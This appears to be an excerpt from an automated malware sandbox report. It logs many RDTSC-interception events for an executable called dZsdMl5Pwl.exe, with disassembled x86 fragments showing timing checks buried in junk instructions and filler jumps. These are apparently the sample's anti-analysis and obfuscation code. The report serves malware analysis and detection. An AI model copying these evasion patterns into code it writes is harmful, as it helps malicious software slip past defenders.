Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F4091 second address: 13F40AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F49E47F2146h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40AB second address: 13F40C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Ah 0x00000007 jnc 00007F49E4E2C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40C7 second address: 13F40CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40CB second address: 13F40CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40CF second address: 13F40EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F2151h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F49E47F214Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40EE second address: 13F40F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F3BE8 second address: 13F3BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CCA second address: 13F5CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CCE second address: 13F5CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CD4 second address: 13F5CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CDA second address: 13F5D31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a ja 00007F49E47F2146h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F49E47F2152h 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F49E47F2158h 0x00000022 push eax 0x00000023 pop eax 0x00000024 popad 0x00000025 push ebx 0x00000026 jc 00007F49E47F2146h 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 jno 00007F49E47F2146h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0076 second address: 76F00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 jmp 00007F49E4E2C442h 0x0000000c push eax 0x0000000d pushad 0x0000000e mov edi, 769E5694h 0x00000013 mov edi, 63544800h 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F49E4E2C442h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F00B1 second address: 76F00C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F00C3 second address: 76F010D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007F49E4E2C447h 0x00000010 xchg eax, esi 0x00000011 jmp 00007F49E4E2C446h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F49E4E2C43Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F010D second address: 76F011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F011F second address: 76F017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F49E4E2C448h 0x00000012 or eax, 663B9FC8h 0x00000018 jmp 00007F49E4E2C43Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F49E4E2C448h 0x00000024 xor cl, 00000028h 0x00000027 jmp 00007F49E4E2C43Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F017F second address: 76F0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0185 second address: 76F0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0189 second address: 76F023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [76EB06ECh] 0x00000011 jmp 00007F49E47F2156h 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F49E47F214Eh 0x0000001f and eax, 1C5AB6E8h 0x00000025 jmp 00007F49E47F214Bh 0x0000002a popfd 0x0000002b jmp 00007F49E47F2158h 0x00000030 popad 0x00000031 jne 00007F49E47F30B6h 0x00000037 jmp 00007F49E47F2150h 0x0000003c xchg eax, edi 0x0000003d jmp 00007F49E47F2150h 0x00000042 push eax 0x00000043 jmp 00007F49E47F214Bh 0x00000048 xchg eax, edi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F49E47F2155h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F023E second address: 76F0244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0244 second address: 76F0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0248 second address: 76F024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F024C second address: 76F02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [76E80B60h] 0x0000000e mov eax, 7617E5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F49E47F2155h 0x0000001b adc al, 00000026h 0x0000001e jmp 00007F49E47F2151h 0x00000023 popfd 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 push 00000044h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F49E47F2159h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F02A7 second address: 76F032A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C447h 0x00000009 or si, D9BEh 0x0000000e jmp 00007F49E4E2C449h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F49E4E2C449h 0x00000022 or ecx, 06A036A6h 0x00000028 jmp 00007F49E4E2C441h 0x0000002d popfd 0x0000002e mov esi, 0D08F9D7h 0x00000033 popad 0x00000034 xchg eax, edi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov eax, 72E91D65h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F032A second address: 76F036A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F49E47F2152h 0x00000008 and ecx, 57142778h 0x0000000e jmp 00007F49E47F214Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ah, 5Eh 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F49E47F2151h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F036A second address: 76F0370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0370 second address: 76F0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0374 second address: 76F0378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03D9 second address: 76F03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03DD second address: 76F03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03E3 second address: 76F03F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03F2 second address: 76F040E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F49E4E2C440h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F040E second address: 76F045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8504h 0x00000007 pushfd 0x00000008 jmp 00007F49E47F214Dh 0x0000000d sbb si, A846h 0x00000012 jmp 00007F49E47F2151h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test esi, esi 0x0000001d jmp 00007F49E47F214Eh 0x00000022 je 00007F4A53F313A1h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx edx, ax 0x0000002e mov cx, 33F5h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F045E second address: 76F0497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F49E4E2C43Fh 0x00000010 mov dword ptr [esi], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F49E4E2C445h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0497 second address: 76F0500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E47F2157h 0x00000009 xor ch, FFFFFFEEh 0x0000000c jmp 00007F49E47F2159h 0x00000011 popfd 0x00000012 mov di, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+04h], eax 0x0000001b jmp 00007F49E47F214Ah 0x00000020 mov dword ptr [esi+08h], eax 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 jmp 00007F49E47F214Ah 0x0000002b popad 0x0000002c mov dword ptr [esi+0Ch], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 mov dx, 79AEh 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0500 second address: 76F057A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F49E4E2C440h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F49E4E2C43Dh 0x0000001d add ax, F896h 0x00000022 jmp 00007F49E4E2C441h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F49E4E2C440h 0x0000002e add esi, 626728B8h 0x00000034 jmp 00007F49E4E2C43Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F057A second address: 76F05A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05A0 second address: 76F05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05A4 second address: 76F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05AA second address: 76F05F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C440h 0x00000009 or eax, 1B504D78h 0x0000000f jmp 00007F49E4E2C43Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+14h], eax 0x0000001d jmp 00007F49E4E2C442h 0x00000022 mov eax, dword ptr [ebx+54h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05F3 second address: 76F05F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05F7 second address: 76F05FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05FD second address: 76F0632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c pushad 0x0000000d mov si, 4E4Dh 0x00000011 mov ax, 8249h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+58h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F49E47F214Bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0632 second address: 76F06CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C43Fh 0x00000009 jmp 00007F49E4E2C443h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F49E4E2C448h 0x00000015 adc esi, 1B6DEE28h 0x0000001b jmp 00007F49E4E2C43Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 pushad 0x00000028 mov eax, 2B8FE63Bh 0x0000002d pushfd 0x0000002e jmp 00007F49E4E2C440h 0x00000033 add ax, A088h 0x00000038 jmp 00007F49E4E2C43Bh 0x0000003d popfd 0x0000003e popad 0x0000003f mov eax, dword ptr [ebx+5Ch] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F49E4E2C445h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F06CD second address: 76F0719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c jmp 00007F49E47F214Eh 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 jmp 00007F49E47F2150h 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 mov dh, 27h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+64h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0719 second address: 76F071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F071D second address: 76F0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0721 second address: 76F0727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0727 second address: 76F072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F072D second address: 76F0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0731 second address: 76F0778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2150h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F49E47F214Eh 0x00000015 or ecx, 27F74538h 0x0000001b jmp 00007F49E47F214Bh 0x00000020 popfd 0x00000021 mov ebx, esi 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+68h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0778 second address: 76F077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F077E second address: 76F0827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F49E47F2154h 0x00000008 pop ecx 0x00000009 mov bx, 2686h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+2Ch], eax 0x00000013 jmp 00007F49E47F214Dh 0x00000018 mov ax, word ptr [ebx+6Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F49E47F214Ch 0x00000023 and ax, C128h 0x00000028 jmp 00007F49E47F214Bh 0x0000002d popfd 0x0000002e mov esi, 3E09061Fh 0x00000033 popad 0x00000034 mov word ptr [esi+30h], ax 0x00000038 jmp 00007F49E47F2152h 0x0000003d mov ax, word ptr [ebx+00000088h] 0x00000044 pushad 0x00000045 mov al, DEh 0x00000047 push eax 0x00000048 push edx 0x00000049 pushfd 0x0000004a jmp 00007F49E47F2159h 0x0000004f or al, FFFFFFA6h 0x00000052 jmp 00007F49E47F2151h 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0827 second address: 76F0847 instructions: 0x00000000 rdtsc 0x00000002 call 00007F49E4E2C440h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0847 second address: 76F084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F084B second address: 76F084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F084F second address: 76F0855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0855 second address: 76F0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C440h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0869 second address: 76F08B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007F49E47F2157h 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 jmp 00007F49E47F2156h 0x0000001b mov eax, dword ptr [ebx+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, F650h 0x00000025 mov al, dl 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F08B4 second address: 76F091E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d mov ax, C47Bh 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+1Ch] 0x00000017 jmp 00007F49E4E2C43Ah 0x0000001c mov dword ptr [esi+3Ch], eax 0x0000001f jmp 00007F49E4E2C440h 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F49E4E2C43Dh 0x00000030 adc ax, EAE6h 0x00000035 jmp 00007F49E4E2C441h 0x0000003a popfd 0x0000003b mov ax, 8917h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F091E second address: 76F095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F49E47F214Fh 0x0000000b and cx, 261Eh 0x00000010 jmp 00007F49E47F2159h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+40h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F095E second address: 76F0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B003B second address: 76B008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F49E4E2C43Eh 0x00000010 and esp, FFFFFFF0h 0x00000013 jmp 00007F49E4E2C440h 0x00000018 sub esp, 44h 0x0000001b pushad 0x0000001c push eax 0x0000001d mov bx, FD40h 0x00000021 pop edx 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B008F second address: 76B0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0093 second address: 76B0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0099 second address: 76B00DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F49E47F214Fh 0x00000015 or ax, 17CEh 0x0000001a jmp 00007F49E47F2159h 0x0000001f popfd 0x00000020 mov bx, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B00DB second address: 76B00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B00E1 second address: 76B0149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F49E47F2156h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F49E47F214Dh 0x0000001b xor eax, 50B6A416h 0x00000021 jmp 00007F49E47F2151h 0x00000026 popfd 0x00000027 call 00007F49E47F2150h 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
